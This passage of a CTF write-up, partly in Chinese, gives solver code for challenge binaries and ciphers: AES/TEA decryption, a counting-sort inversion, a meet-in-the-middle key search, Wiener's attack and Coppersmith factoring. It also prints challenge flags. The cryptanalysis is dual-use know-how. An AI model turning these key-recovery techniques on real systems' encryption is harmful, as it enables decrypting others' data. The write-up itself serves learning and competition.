        b = text[i * 4 + 1];
        c = text[i * 4 + 2];
        d = text[i * 4 + 3];
        text[i * 4 + 0] = Multiply(a, 0x0e) ^ Multiply(b, 0x0b) ^ Multiply(c, 0x0d) ^ Multiply(d, 0x09);
        text[i * 4 + 1] = Multiply(a, 0x09) ^ Multiply(b, 0x0e) ^ Multiply(c, 0x0b) ^ Multiply(d, 0x0d);
        text[i * 4 + 2] = Multiply(a, 0x0d) ^ Multiply(b, 0x09) ^ Multiply(c, 0x0e) ^ Multiply(d, 0x0b);
        text[i * 4 + 3] = Multiply(a, 0x0b) ^ Multiply(b, 0x0d) ^ Multiply(c, 0x09) ^ Multiply(d, 0x0e);
    }
    return;
}

// Decrypt one 16-byte block in place. Two layers are peeled off in order:
// first the modified AES (round keys taken from roundkeys[], last to first),
// then a TEA-like cipher keyed with the first 16 bytes of roundkeys[].
void dec_data(unsigned char *data)
{
    // --- AES layer ---------------------------------------------------------
    // Start at the last round key (index 10) and step back 16 bytes per round.
    unsigned char* proundkey = &roundkeys[16 * 10];
    AddRoundKeys(data, proundkey);
    ShiftRowsRe(data);
    SubBytesRe(data, data, 16);
    proundkey -= 16;
    for (int i = 0; i < 9; i++) {
        AddRoundKeys(data, proundkey);
        // Leftover debug marker: prints "1" when the pointer is at the round
        // key whose first byte is 0xC4 (roundkeys[16]).
        if (*proundkey == 0xC4) {
            printf("1");
        }
        MixColumnsRe(data);
        // NOTE(review): these rounds call the forward ShiftRows/SubBytes while
        // the first step above uses the *Re variants. Presumably this mirrors
        // the challenge's modified AES; confirm against the binary.
        ShiftRows(data);
        SubBytes(data, data, 16);
        proundkey -= 16;
    }
    // Initial whitening: round key 0, plus a constant 0x66 on every byte.
    for (int i = 0; i < 16; i++) {
        data[i] ^= roundkeys[i];
        data[i] ^= 0x66;
    }

    // --- TEA-like layer ----------------------------------------------------
    // The block and the key are reinterpreted as 32-bit words in place.
    // NOTE(review): this depends on host byte order and alignment; presumably
    // little-endian x86, matching the target exe.
    unsigned int& v0 = *(unsigned int*)(data);
    unsigned int& v1 = *(unsigned int*)(data+4);
    unsigned int& v2 = *(unsigned int*)(data+8);
    unsigned int& v3 = *(unsigned int*)(data+12);
    unsigned int& k0 = *(unsigned int*)(roundkeys);
    unsigned int& k1 = *(unsigned int*)(roundkeys + 4);
    unsigned int& k2 = *(unsigned int*)(roundkeys + 8);
    unsigned int& k3 = *(unsigned int*)(roundkeys + 12);
    unsigned int delta = 0x73637466;
    unsigned char *byte_delta = (unsigned char*)&delta;
    // XOR one byte of delta into each word (only the low byte of the word changes).
    v0 ^= byte_delta[3];
    v1 ^= byte_delta[2];
    v2 ^= byte_delta[1];
    v3 ^= byte_delta[0];
    // 0x6c6e8cc0 == 0x20 * delta modulo 2^32: the sum after 32 forward rounds.
    unsigned int sum1 = 0x6c6e8cc0;
    unsigned int sum2 = 0x6c6e8cc0;
    // Two 64-bit halves (v0,v1) and (v2,v3) are processed side by side; the
    // round index i is mixed into every round. The v3 line uses sum1 in one
    // term, which is harmless because sum1 and sum2 are always equal here.
    for (int i = 0x1F; i >= 0; i--) {
        v1 -= (sum1 + i) ^ (k1 + (v0 >> 5)) ^ (sum1 + v0) ^ (k0 + (v0 << 4));
        v3 -= (sum2 + i) ^ (k1 + (v2 >> 5)) ^ (sum1 + v2) ^ (k0 + (v2 << 4));
        v0 -= (sum1 + i) ^ (k3 + (v1 >> 5)) ^ (sum1 + v1) ^ (k2 + (v1 << 4));
        v2 -= (sum2 + i) ^ (k3 + (v3 >> 5)) ^ (sum2 + v3) ^ (k2 + (v3 << 4));
        sum1 -= delta;
        sum2 -= delta;
    }
}

// Print the final TEA sum (a sanity check for the 0x6c6e8cc0 constant used in
// dec_data), then decrypt the two 16-byte ciphertext blocks and print the
// result as a string.
int main()
{
    unsigned int sum1 = 0;
    unsigned int sum2 = 0;
    unsigned int delta = 0x73637466;
    for (int i = 0; i < 0x20; i++) {
        sum1 += delta;
        sum2 += delta;
    }
    printf("%x\n", sum1);
    printf("%x\n", sum2);
    // Disabled helper that printed the first three rand() values for a fixed seed.
    /*srand(0x53435446); for (int i = 0; i < 3; i++) { printf("0x%x\n", rand()); }*/
    // 32 ciphertext bytes plus one spare byte for the NUL terminator.
    unsigned char dst[0x21] = { 0xBE, 0x1C, 0xB3, 0xF3, 0xA1, 0xF4, 0xE4, 0x63, 0x11, 0xE1, 0x1C, 0x6B, 0x54, 0x0A, 0xDF, 0x74, 0xF2, 0x93, 0x55, 0xDA, 0x48, 0xFC, 0xA2, 0x3C, 0x89, 0x63, 0x2E, 0x7F, 0x8D, 0xA4, 0x6D, 0x4E };;
    dec_data(dst);
    dec_data(dst+0x10);
    dst[0x20] = 0;
    printf("%s\n", dst);
}
```
Flag: `SCTF{5277cc2af8f1155f7a61030f46fdf9df}`
### godness dance:
输入长度28位 a~z各一个 再加个i和u 正向算法 一共三个循环 a数组是比较数组 flag是输入 flag2是输出 xb是下标
```c
#include<stdio.h>
char a[100]={ 0x00000002, 0x0000001A, 0x00000011, 0x0000001C, 0x00000018, 0x0000000B, 0x00000015, 0x0000000A, 0x00000010, 0x00000014, 0x00000013, 0x00000012, 0x00000003, 0x00000008, 0x00000006, 0x0000000C, 0x00000009, 0x0000000E, 0x0000000D, 0x00000016, 0x00000004, 0x0000001B, 0x0000000F, 0x00000017, 0x00000001, 0x00000019, 0x00000007, 0x00000005 };
char flag[100]="0abcdefghijklmnopqrstuvwxyziu";
char flag2[100];
char xb[400];
int main(){
    flag[0]=0;
    for(int i=1;i<=28;i++){
        xb[flag[i]]++; // count how often each input character occurs
    }
    int v7=0;
    for(int i=1;i<=200;i++){
        v7+=xb[i];
        xb[i]=v7; // turn the counts into a running (prefix) sum
    }
    int v10,v11;
    // Walk the input from the back; each character's running sum is the output
    // slot that receives the character's 1-based position.
    for(int i=28;i>0;i--){
        v10=flag[i];
        v11=xb[v10];
        flag2[v11]=i;
        xb[v10]=v11-1;
    }
    for(int 
i=0;i<=28;i++){ printf("%x ",flag2[i]); } return 0; } ``` 逆向脚本: ```c #include<stdio.h> char xb[500]={ 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000002, 0x00000003, 0x00000004, 0x00000005, 0x00000006, 0x00000007, 0x00000008, 0x0000000A, 0x0000000B, 0x0000000C, 0x0000000D, 0x0000000E, 0x0000000F, 0x00000010, 0x00000011, 0x00000012, 0x00000013, 0x00000014, 0x00000015, 0x00000017, 0x00000018, 0x00000019, 0x0000001A, 0x0000001B, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 
0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C, 0x0000001C}; char a[100]={ 0,0x00000002, 0x0000001A, 0x00000011, 0x0000001C, 0x00000018, 0x0000000B, 0x00000015, 0x0000000A, 0x00000010, 0x00000014, 0x00000013, 0x00000012, 0x00000003, 0x00000008, 0x00000006, 0x0000000C, 0x00000009, 0x0000000E, 0x0000000D, 0x00000016, 0x00000004, 0x0000001B, 0x0000000F, 0x00000017, 0x00000001, 0x00000019, 0x00000007, 0x00000005 }; char flag[100]; int main(){ int v11,v10; for(int i=28;i>0;i--){ for(int j=1;j<=28;j++){ if(a[j]==i){ v11=j; //printf("%d,",v11); break; } } //for(int q=97;q<=122;q++){ // printf("%x ",xb[q]); //} //printf("!%x ",v11); for(int q=97;q<=122;q++){ if(xb[q]==v11){ v10=q; printf("%c ",q); } } printf("\n"); xb[v10]=v11-1; } return 0; } ``` 求出来 有的有多解 有的没有解 根据输入限制还原 再逆序即可 ## Crypto: ### ciruit map: 题目中使用的对称加密方式是使用两个密钥依次加密,这样的加密方式可以使用中间相遇攻击将它的安全性降至与单次加密相同。具体来说就是对一组明文m和密文c,先枚举第一次加密的密钥key1,将加密的结果E(key1,m)作为键、key1作为值使用哈希表存储下来,再枚举第二次加密的密钥key2,将D(key2,c)作为键在哈希表中查找,如果找到值则 (key1,key2) 就是一个合法的密钥。 本题的每一次加密不仅加密了明文,还加密了0作为校验,这给我们提供了明密文对。 但由于本题的明密文空间较小,而密钥空间较大,仅对一组明密文进行攻击会获得大量可能的密钥。所以还需要利用多组相关的密钥加密了同一个明文,找出真实的密钥。 使用上述方法对5、6两个门进行攻击,即可得到密钥,再按题目中的方式进行异或即可得到flag Exp:参考https://vergissmeinnichtz.github.io/posts/2021dicectf-writeup/ ```cpp #include <iostream> #include <unordered_map> #include <vector> using namespace std; unsigned int SBoxes[6][16] = { { 15, 1, 7, 0, 9, 6, 2, 14, 11, 8, 5, 3, 12, 13, 4, 10 }, { 3, 7, 8, 9, 11, 0, 15, 13, 4, 1, 10, 2, 14, 6, 12, 5 }, { 4, 12, 9, 8, 5, 13, 11, 7, 6, 3, 10, 14, 15, 1, 2, 0 }, { 2, 4, 10, 5, 7, 13, 1, 15, 
0, 11, 3, 12, 14, 9, 8, 6 }, { 3, 8, 0, 2, 13, 14, 5, 11, 9, 1, 7, 12, 4, 6, 10, 15 }, { 14, 12, 7, 0, 11, 4, 13, 15, 10, 3, 8, 9, 2, 6, 1, 5 } }; unsigned int SInvBoxes[6][16] = { { 3, 1, 6, 11, 14, 10, 5, 2, 9, 4, 15, 8, 12, 13, 7, 0 }, { 5, 9, 11, 0, 8, 15, 13, 1, 2, 3, 10, 4, 14, 7, 12, 6 }, { 15, 13, 14, 9, 0, 4, 8, 7, 3, 2, 10, 6, 1, 5, 11, 12 }, { 8, 6, 0, 10, 1, 3, 15, 4, 14, 13, 2, 9, 11, 5, 12, 7 }, { 2, 9, 3, 0, 12, 6, 13, 10, 1, 8, 14, 7, 11, 4, 5, 15 }, { 3, 14, 12, 9, 5, 15, 13, 2, 10, 11, 8, 4, 1, 6, 0, 7 } }; unsigned int PBox[] = { 15, 22, 11, 20, 16, 8, 2, 3, 14, 19, 18, 1, 12, 4, 9, 13, 23, 21, 10, 17, 0, 5, 6, 7 }; unsigned int PInvBox[] = { 20, 11, 6, 7, 13, 21, 22, 23, 5, 14, 18, 2, 12, 15, 8, 0, 4, 19, 10, 9, 3, 17, 1, 16 }; unordered_map<unsigned int, unsigned int> middle_data; unsigned int S(unsigned int block, unsigned int SBoxes[6][16]) { unsigned int output = 0; for (int i = 0; i < 6; i++) { output |= SBoxes[i][(block >> 4 * i) & 0b1111] << 4 * i; } return output; } unsigned int permute(unsigned int block, unsigned int pbox[]) { unsigned int output = 0; unsigned int bit = 0; for (int i = 0; i < 24; i++) { bit = (block >> pbox[i]) & 1; output |= (bit << i); } return output; } unsigned int encrypt_data(unsigned int block, unsigned int key) { unsigned int res = block; for (int i = 0; i < 3; i++) { res ^= key; res = S(res, SBoxes); res = permute(res, PBox); } res ^= key; return res; } unsigned int decrypt_data(unsigned int block, unsigned int key) { unsigned int res = block; res ^= key; for (int i = 0; i < 3; i++) { res = permute(res, PInvBox); res = S(res, SInvBoxes); res ^= key; } return res; } unsigned int encrypt(unsigned int block, unsigned int key1, unsigned int key2) { unsigned int res = block; res = encrypt_data(res, key1); res = encrypt_data(res, key2); return res; } unsigned int decrypt(unsigned int block, unsigned int key1, unsigned int key2) { unsigned int res = block; res = decrypt_data(res, key2); res = decrypt_data(res, key1); 
return res; }

// Forward half of the meet-in-the-middle search.
// For every 24-bit key i, store encrypt_data(0, i) -> i in middle_data
// (2^24 entries). Ciphertexts fit in 24 bits, so when two keys give the same
// ciphertext the extra entry is stored under (count << 24 | enc), with count
// being the first free slot number starting at 1.
// Takeaway for designers: chaining two encryptions under independent keys
// costs an attacker about as much as one encryption, not the combined key
// length, once a known plaintext such as this encrypted zero is available.
void init_middle_data() {
    cout << "Init middle data" << endl;
    unsigned int enc = 0;
    for (unsigned int i = 0; i < 0x1000000; i++) {
        enc = encrypt_data(0, i);
        if (middle_data.find(enc) == middle_data.end()) {
            middle_data.insert(pair<unsigned int, unsigned int>(enc, i));
        }
        else {
            // Collision: probe slot 1, 2, ... in the upper bits until free.
            unsigned int count = 0;
            unsigned int tmp = 0;
            do {
                count++;
                tmp = count << 24 | enc;
            } while (middle_data.find(tmp) != middle_data.end());
            middle_data.insert(pair<unsigned int, unsigned int>(tmp, i));
        }
    }
}

// Backward half of the meet-in-the-middle search for one check value t.
// For every 24-bit outer key i, decrypt t under i and look the result up in
// middle_data; each hit gives an inner key k1 with
// encrypt_data(0, k1) == decrypt_data(t, i).
// Returns a map outer key -> inner key. Further inner keys for the same outer
// key are stored under (count << 24 | outer key), the same slot scheme as
// middle_data.
unordered_map<unsigned int, unsigned int> find_possible_key(unsigned int t) {
    cout << "Find possible keys for " << t << endl;
    unordered_map<unsigned int, unsigned int> result;
    unsigned int dec = 0;
    for (unsigned int i = 0; i < 0x1000000; i++) {
        unsigned int dec_count = 0;
        dec = decrypt_data(t, i);
        unsigned int dec_tmp = dec;
        // Visit every collision slot recorded for this middle value.
        while (middle_data.find(dec) != middle_data.end()) {
            unsigned int key = i;
            if (result.find(key) == result.end()) {
                result.insert(pair<unsigned int, unsigned int>(key, middle_data[dec]));
            }
            else {
                unsigned int count = 0;
                unsigned int tmp;
                do {
                    count++;
                    tmp = count << 24 | key;
                } while (result.find(tmp) != result.end());
                result.insert(pair<unsigned int, unsigned int>(tmp, middle_data[dec]));
            }
            dec_count++;
            dec = dec_count << 24 | dec_tmp;
        }
    }
    return result;
}

// Look for a third table row, other than idxi and idxj, that has a candidate
// pair (a0, b1) whose label decrypts to the same value as row idxi under
// (a0, b0). Returns that b1, or 0 if none is found.
// NOTE(review): 0 doubles as the "not found" value, so a real key of 0 would
// be reported as a miss. Both containers are passed by value (copied per call).
unsigned int recover_key_part2(vector<unordered_map<unsigned int, unsigned int>> possible_keys, vector<unsigned int> enc_labels, unsigned int a0, unsigned int b0, int idxi, int idxj) {
    unordered_map<unsigned int, unsigned int> choice_keys;
    unsigned int c, c1, b1, a00;
    for (int i = 0; i < 4; i++) {
        if (i == idxi || i == idxj) continue;
        choice_keys = possible_keys[i];
        c = enc_labels[i];
        c1 = enc_labels[idxi];
        for (auto iter = choice_keys.begin(); iter != choice_keys.end(); ++iter) {
            b1 = iter->first;
            // Skip collision-slot entries; they are reached from the base key below.
            // NOTE(review): recover_key uses '>=' for the same test; with '>'
            // the slot entry 0x1000000 is treated as a base key here.
            if (b1 > 0x1000000) continue;
            unsigned int dec_b1 = b1;
            unsigned int count = 0;
            while (choice_keys.find(b1) != choice_keys.end()) {
                a00 = choice_keys[b1];
                if (a0 == a00 && decrypt(c, a0, dec_b1) == decrypt(c1, a0, b0)) {
                    return dec_b1;
                }
                count++;
                b1 = count << 24 | dec_b1;
            }
        }
    }
    return 0;
}

// Narrow the candidate key pairs of one gate (four rows) down to the real ones.
// For each ordered pair of rows (i, j) and each candidate (a0, b0) of row i,
// find a candidate (a1, b0) of row j that shares the outer key b0 and decrypts
// row j's label to the same value; then require recover_key_part2 to find a
// third row consistent with a0. Prints the keys and returns true on the first
// match, false if no combination fits.
bool recover_key(vector<unordered_map<unsigned int, unsigned int>> possible_keys, vector<unsigned int> enc_labels) {
    unordered_map<unsigned int, unsigned int> choice_keys, choice_keys2;
    unsigned int c1, b0, a0, p1, c2, a1, b1;
    for (int i = 0; i < 4; i++) {
        cout << "Recover key " << i << endl;
        choice_keys = possible_keys[i];
        c1 = enc_labels[i];
        for (int j = 0; j < 4; j++) {
            if (i == j) continue;
            choice_keys2 = possible_keys[j];
            c2 = enc_labels[j];
            for (auto iter = choice_keys.begin(); iter != choice_keys.end(); ++iter) {
                b0 = iter->first;
                // Start only from base keys; slot entries are walked below.
                if (b0 >= 0x1000000) continue;
                unsigned int count = 0;
                unsigned int dec_b0 = b0;
                while (choice_keys.find(b0) != choice_keys.end()) {
                    a0 = choice_keys[b0];
                    p1 = decrypt(c1, a0, dec_b0);
                    unsigned int b0_tmp = dec_b0;
                    unsigned int count_tmp = 0;
                    while (choice_keys2.find(b0_tmp) != choice_keys2.end()) {
                        a1 = choice_keys2[b0_tmp];
                        if (p1 == decrypt(c2, a1, dec_b0)) {
                            b1 = recover_key_part2(possible_keys, enc_labels, a0, dec_b0, i, j);
                            if (b1 != 0) {
                                // NOTE(review): b0 may carry the slot counter in
                                // its upper bits at this point; dec_b0 is the
                                // plain 24-bit key.
                                cout << "Find keys : a0 = " << a0 << ", b0 = " << b0 << endl;
                                cout << "Find keys : a1 = " << a1 << ", b1 = " << b1 << endl;
                                return true;
                            }
                        }
                        count_tmp++;
                        b0_tmp = count_tmp << 24 | dec_b0;
                    }
                    count++;
                    b0 = count << 24 | dec_b0;
                }
            }
        }
    }
    return false;
}

// Two gates, four rows each. As used in main(): element [0] of a row is the
// encrypted output label, element [1] is the check value (the encryption of 0).
unsigned int g_tables[2][4][2] = { { { 13303835, 2123830 }, { 2801785, 11303723 }, { 13499998, 248615 }, { 13892520, 7462011 } }, { { 3244202, 918053 }, { 3277177, 6281266 }, { 1016382, 7097624 }, { 10016472, 13600867 } } };

// Build the forward table once, then attack each of the two gates.
// The boolean result of recover_key is not checked; the keys are only printed.
int main() {
    init_middle_data();
    for (int i = 0; i < 2; i++) {
        vector<unordered_map<unsigned int, unsigned int>> possible_keys(4);
        vector<unsigned int> enc_labels(4);
        for (int j = 0; j < 4; j++) {
            possible_keys[j] = find_possible_key(g_tables[i][j][1]);
            enc_labels[j] = g_tables[i][j][0];
        }
        recover_key(possible_keys, enc_labels);
    }
}
```
### cubic:
首先维纳攻击进行n的分解
```python
import gmpy2
def transform(x,y): res=[] while y: 
res.append(x//y) x,y=y,x%y return res def continued_fraction(sub_res): numerator,denominator=1,0 for i in sub_res[::-1]: denominator,numerator=numerator,i*numerator+denominator return denominator,numerator def sub_fraction(x,y): res=transform(x,y) res=list(map(continued_fraction,(res[0:i] for i in range(1,len(res))))) return res def get_pq(a,b,c): par=gmpy2.isqrt(b*b-4*a*c) x1,x2=(-b+par)//(2*a),(-b-par)//(2*a) return x1,x2 def wienerAttack(e,n): for (d,k) in sub_fraction(e,n): if k==0: continue if (e*d-1)%k!=0: continue phi=(e*d-1)//k px,qy=get_pq(1,n-phi+1,n) if px*qy==n: p,q=abs(int(px)),abs(int(qy)) return p,q e = 9533278200186123232236255017820030899569321116975283610713219562976859282824769175839530288456710655549433026017454019192757166179005337670254091772646437151243714834367106636896725901744638364418760602224374324165775574770864986671566019730363538367466997593727876882822226184151038893879103698443945293847761718465733847048318476592993938546577400002229026755758669459562980676284055764279623940654524820913748828674997382229998030130717936535141033821755462081778813604611338986102222660371803785762969181621218624796493312572275511971794882449038824970725178686293662493656905459347774879501185875539718874596705 n = 14533245492446527990345804759759265012893540862095541076764366082162576424755678240374119853002994542918519612781550114466644551880575428571787273115280704900606787020945247741998359421177511929458079825267036269693713148678862507031531248089239354359191143729297092801032361602172716175954312630588896757718042441989110187870325071709527175394543291651133818077232316593509803919091438980501420924485255304400323647448229591713022185198524897342992169577444483465121248099368278930389563834415446275706495338241714074151990802889614140955511002526006908659733001659342145618261258586334209496357584069738531543185643 p,q=wienerAttack(e,n) print(p,q) ``` 一般群阶大概率为p^k-1,猜测尝试得到满足阶为p^3-1 ```python from Crypto.Util.number import * p = 
115356711636749245156428519458636760545287171955837394007931505138890850701876498266134803543895098613075361320835965827472765949794003038903506822615342957623004533347868289057693604661343441236478222117768645098958342143045640790153260606746369968440132414640921105454181075856858313645232243646490791143429 q = 125985261596314996949393327666347537665507236994609367083543107427822419313343886798160820715681669638794070650250819706819457380274959897647804094613682989233500345434447381207712718027522538346527719121207487881267812370653129045663352226625659915082751177397671798591739316392072747999992839263298815877167 cipher = (19401192786966300532063177618773965478538951716844906979027097461882319271723756535227025371366424481096803190792137439173058427577594858006479190632023945291395553010462159807986006596072405263490861756087442717134978083923641809766850473777710604477252916210877891252017405744142227511286767829269553294336756529935586192065089420814422102488899440429178931646662530829741013344995653698777374392519058638770425295595568042139898993932719608481941701573299167516692153488013255445514390718011610678985078041611587192596195431273759849201865428200777127652247124701499844530845285581747664809197645372537112907753294744666809939100248832526975988078979846304735556676879070283372620407563114079549390001614799409235247430564281086028723268710367808857295000524215328789488393516899819570225687309921170070400449014698288214878049935514150656414112003665253918449695508103327478082775164329716254328417047786485715850849491, 
781345565099013799262792311376039553581950277400853785676734743854876406972350007716903106115125771065169204495496180297257809292105173197174813132213006684314530872985622881055672616933023112300221070497375397535378206020875309068272094018415338953584215096897052296848052275326788043519255038653375446710420286057685279061546543355323454291614710011662212021015262569351351041865697991928279541885568927192751464222353378141819281693362464536421214120712733991912395062495944602752835629568101437486725616698427495555701421076231109563764495081513237064117298426845564929666308059091066733289775789699894898615709137339594895445533569418324483308859638701245164859339421118392040280281680683626195400974220189495986948519076368788184937032480616161120543458690020582758071619538749391382511525334607462520186940933475378898157280914896196668892146480551051128480840137563017179495847486710185694855735521798106210110142721) padding = 93159292640264950611710682227074947882037468832573625293582195909275172905258002329209847723845892457894618211087939941465457691732712138554758169033813255339835367015850182903569284007604039649586605297810361911121565847931915078370592312225824613495742165146077915195241520260410992313667954037284958254599 e = 9533278200186123232236255017820030899569321116975283610713219562976859282824769175839530288456710655549433026017454019192757166179005337670254091772646437151243714834367106636896725901744638364418760602224374324165775574770864986671566019730363538367466997593727876882822226184151038893879103698443945293847761718465733847048318476592993938546577400002229026755758669459562980676284055764279623940654524820913748828674997382229998030130717936535141033821755462081778813604611338986102222660371803785762969181621218624796493312572275511971794882449038824970725178686293662493656905459347774879501185875539718874596705 d = inverse(e, ((p**3)-1)*((q**3)-1)*((padding**3)-1)) def add(P, Q, mod): x1, y1 = P x2, y2 = Q if x2 is None: return P if x1 is 
None: return Q if y1 is None and y2 is None: x = x1 * x2 % mod y = (x1 + x2) % mod return (x, y) if y1 is None and y2 is not None: x1, y1, x2, y2 = x2, y2, x1, y1 if y2 is None: if (y1 + x2) % mod != 0: x = (x1 * x2 + 2) * inverse(y1 + x2, mod) % mod y = (x1 + y1 * x2) * inverse(y1 + x2, mod) % mod return (x, y) elif (x1 - y1 ** 2) % mod != 0: x = (x1 * x2 + 2) * inverse(x1 - y1 ** 2, mod) % mod return (x, None) else: return (None, None) else: if (x1 + x2 + y1 * y2) % mod != 0: x = (x1 * x2 + (y1 + y2) * 2) * inverse(x1 + x2 + y1 * y2, mod) % mod y = (y1 * x2 + x1 * y2 + 2) * inverse(x1 + x2 + y1 * y2, mod) % mod return (x, y) elif (y1 * x2 + x1 * y2 + 2) % mod != 0: x = (x1 * x2 + (y1 + y2) * 2) * inverse(y1 * x2 + x1 * y2 + 2, mod) % mod return (x, None) else: return (None, None) def myPower(P, a, mod): target = (None, None) t = P while a > 0: if a % 2: target = add(target, t, mod) t = add(t, t, mod) a >>= 1 return target n = p*q*padding M = myPower(cipher,d,n) print(long_to_bytes(M[0])+long_to_bytes(M[1])) #SCTF{@@##Say_say_it_again_Sometimes_the_RSA_was_winding_in_my_mind@@##} ``` ### ChristmasZone: 首先分解N ![](https://i.imgur.com/SHev1ir.png) 找到论文https://eprint.iacr.org/2021/1160.pdf 利用二元copper分解N 然后整个Complex部分就是个复数乘法群,那么阶就是 ![](https://i.imgur.com/IAhQlPY.png) 求出最初的flag点,然后最后先求出a,b,x再解同余方程 ![](https://i.imgur.com/mXhLFf9.png) ![](https://i.imgur.com/znYssTi.png) ```python #分解N ''' import itertools def small_roots(f, bounds, m=1, d=None): if not d: d = f.degree() R = f.base_ring() N = R.cardinality() f /= f.coefficients().pop(0) f = f.change_ring(ZZ) G = Sequence([], f.parent()) for i in range(m+1): base = N^(m-i) * f^i for shifts in itertools.product(range(d), repeat=f.nvariables()): g = base * prod(map(power, f.variables(), shifts)) G.append(g) B, monomials = G.coefficient_matrix() monomials = vector(monomials) factors = [monomial(*bounds) for monomial in monomials] for i, factor in enumerate(factors): B.rescale_col(i, factor) B = B.dense_matrix().LLL() B = 
B.change_ring(QQ) for i, factor in enumerate(factors): B.rescale_col(i, 1/factor) H = Sequence([], f.parent().change_ring(QQ)) for h in filter(None, B*monomials): H.append(h) I = H.ideal() if I.dimension() == -1: H.pop() elif I.dimension() == 0: roots = [] for root in I.variety(ring=ZZ): root = tuple(R(root[var]) for var in f.variables()) roots.append(root) return roots return [] N=64392795853847475796939596948374573513341136006013188358665448316305707477998438325517993586430100318003625505157712138814030987620038360820900112359350226402638642419396935215229157012026467896203963294845355310085476165076942465877433408205263068546705226319393063008332679430070032638523530045872344446063 e=2122057207992053205813770227849040233008910764365408170807753866052370273036652511326089337097360978735074872616654616913246201310148862001548717525315340025551386286859760434183016041810428435636703565295076056164899655565064479034568939414539781862057507880933035055798925469493379171063624396109774778347319852379080566673380010455470481679145108944783447900704049011034802113265281840271722439782048757303053321402550218515376334799866137565004833177407151305907248656027100625115285653505268015889011758846754314363803434935375750532978323034293333866829909394024977100845590141939498841156488858312084500963993 a=N+1 b=N*N-N+1 PR.<x,y> = PolynomialRing(Zmod(e)) f=x*(y*y+a*y+b)+1 #x=k,y=p+q #r=1.999 #gamma=0.569=0.6 from gmpy2 import * #bounds=(N**gamma,3N**0.5) bounds=(2^400, 2^513) m=3 d=4 roots=small_roots(f,bounds,m,d) print(roots) ''' k,p_q=(832657684263002794400448147505043120968204846370594452803058346727684829479897185371522848727041695401569106922002807594, 16075043011792317702314886102947415867389005788775646985921769735667763497545302824191943535380623937133010105678608525588010746665008631519574789537497184) 
N=64392795853847475796939596948374573513341136006013188358665448316305707477998438325517993586430100318003625505157712138814030987620038360820900112359350226402638642419396935215229157012026467896203963294845355310085476165076942465877433408205263068546705226319393063008332679430070032638523530045872344446063 from z3 import * s=Solver() p,q=Ints('p q') s.add(p*q==N) s.add(p+q==p_q) if s.check()==sat: print(s.model()) #求出flag点 val=(19398712966389173067515660342342371376171822855077792430320907920482468319034356508473830699130119726502328267606091971072624658237697431558761718296916369668202230512807622341524837789641448767802361925545348467904711602267688826344269930586157457184165009996779745720616560780946563277776544719243932403743, 13560918884675796397422230974896753903564514060544004622609605573166124357809803049342207856908237157989458174631058128913271365699175849042916944962684319362603309646697695167167430136068004838289739138033112696576679443996914506782400912475705559889360576361738784125657707992917972167925405463413645788482) from Crypto.Util.number import * from gmpy2 import * ''' class Complex: baseRe = 1 baseIm = 0 p= 7580404339410605275626408632293985390119410811758716323067754026905773097627216054700243523685903084284434158078654472410013702925363551739091210471600391 q= 8494638672381712426688477470653430477269594977016930662854015708761990399918086769491700011694720852848575947599954053177997043739645079780483579065896793 n = p*q def __init__(self, re=0, im=0): self.re = re self.im = im def OnePlus(self): _re = (self.re*Complex.baseRe - self.im*Complex.baseIm)%Complex.n _im = (self.re*Complex.baseIm + self.im*Complex.baseRe)%Complex.n Complex.baseRe = _re Complex.baseIm = _im def Double(self): _re = (self.re*self.re - self.im*self.im)%Complex.n _im = (self.re*self.im + self.im*self.re)%Complex.n self.re = _re self.im = _im def val(self): return Complex.baseRe,Complex.baseIm def PowPlus(msg,k): c=Complex(msg[0],msg[1]) while k>0: if k%2: k-=1 
